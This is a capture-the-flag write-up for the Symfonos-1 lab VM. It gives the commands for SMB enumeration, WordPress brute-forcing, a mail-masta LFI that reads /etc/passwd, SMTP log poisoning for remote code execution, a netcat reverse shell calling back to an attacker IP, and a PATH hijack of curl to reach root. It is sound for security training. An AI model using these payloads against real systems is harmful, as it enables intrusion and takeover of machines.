Last updated: 15 Apr 24 09:34:06 (UTC)

Write-Up Symfonos-1

Symfonos-1

By Lawcky 20/01/24

Introduction

Symfonos-1

Difficulty : Easy+

Additionnal info :

Name: symfonos: 1
Release date: 29 Jun 2019
Author: Zayotic
Series: symfonos

|NOTE| if you want to see all the scans we wont copy them here as they would be way too voluminous, click here to see them

In this write-up

  • Nmap
  • Nikto
  • Enum4Linux
  • Wpscan
  • Telnet
  • Log poisoning (LFI)
  • Reverse shell
  • Writable Path

Write-UP

Enum4Linux

we run the enum4linux command on the smb service

9c8675b05c91893189c74d9d2985310d.png

SMB

smbclient -L 192.168.1.90

31e7d2ba4d0ab4f7e622aa98135e80ae.png

trying anonymous user without password
smbclient --user anonymous //192.168.1.90/anonymous

1b15e2ff787cd6b535ee5fffd79a7839.png

we get the file using get

c8457e5c3697a4e0655f51d8bcbf4a7e.png

using these passwords with the known username helios

smbclient --user helios //192.168.1.90/helios

helios:qwerty
(it is not the linux user password)

bc9a1732e32bb9fda6852a8e2b05ad67.png

3aa335b91d4fc47bf6672c099baf6d68.png

found a wordpress site

43049422f998af599f9bbf129338e54e.png

Wordpress

wpscan --> here

we add symfonos.local to /etc/hosts

user enumeration
user ‘helios’ is not valid, user ‘admin’ is

bruteforcing using wpscan

wpscan -U admin -P ~/tools/seclists/rockyou.txt --url http://symfonos.local/h3l105/

enumerate all plugins and themes

wpscan -e ap at --url http://symfonos.local/h3l105/

found this plugins

40ce275f8999f193a62943bc1567daf3.png

searchsploit mail masta

7f9f0cd55032bdc93c52527be57fad47.png

b84a3d04b4fa092d52b66e4c0584cd4e.png

the sqli didnt work

found the LFI at http://symfonos.local/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd

Log Poisoning

we have an LFI we can try to do log poisoning to get a remote code execution,

we cant find apache logs so lets try using the SMTP service.

LFI to /var/mail/helios

bf9ef00d7e802134611d3bca1873690b.png

worked

we need to send a mail to helios@symfonos.local using the smtp service

telnet symfonos.local 25 ehlo 192.168.1.90

then using

MAIL TO: name RCPT TO: helios DATA and ends with .

cc720a779313ab38018fa6ef3e728fcb.png

now lets try the RCE

view-source:http://symfonos.local/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/var/mail/helios&cmd=ls

52b0d5886827cdb2ab687a5159d60173.png

it worked

Reverse Shell

after some tries the reverse shell code that worked was the netcat one

nc -e /bin/sh 192.168.1.253 4444

526e33f520d6a645935420d7bc45a3d3.png

we are directly connect as helios user

3976e2f0136443827a043cd0c323e733.png

Privilege Escalation

from helios to root

66d5173b9d763a83c44dc39c716b16a9.png

found this in the SUID set of root user

23d3efd0857830daaae061aff6130d39.png

it seems that it is running the date as well as the curl command

Writable Path

6669d4d0af817a8c8c299a512e24c3ee.png

we added /tmp to the path, now lets create a fake curl file in /tmp to be called instead of the actual curl command.

echo '/bin/bash' > /tmp/curl

it ran it as the helios user

it turns out that when doing writable path if you call /bin/bash instead of /bin/sh the privesc wont work

after trying again with /bin/sh

3bd0b3a168e490f0953fb7f672cf07ff.png

3c046d19cc6d6b761e1506de842b3e1a.png

got the flag

Joplin Server v2.14.2, copyright © 2021-2024 JOPLIN.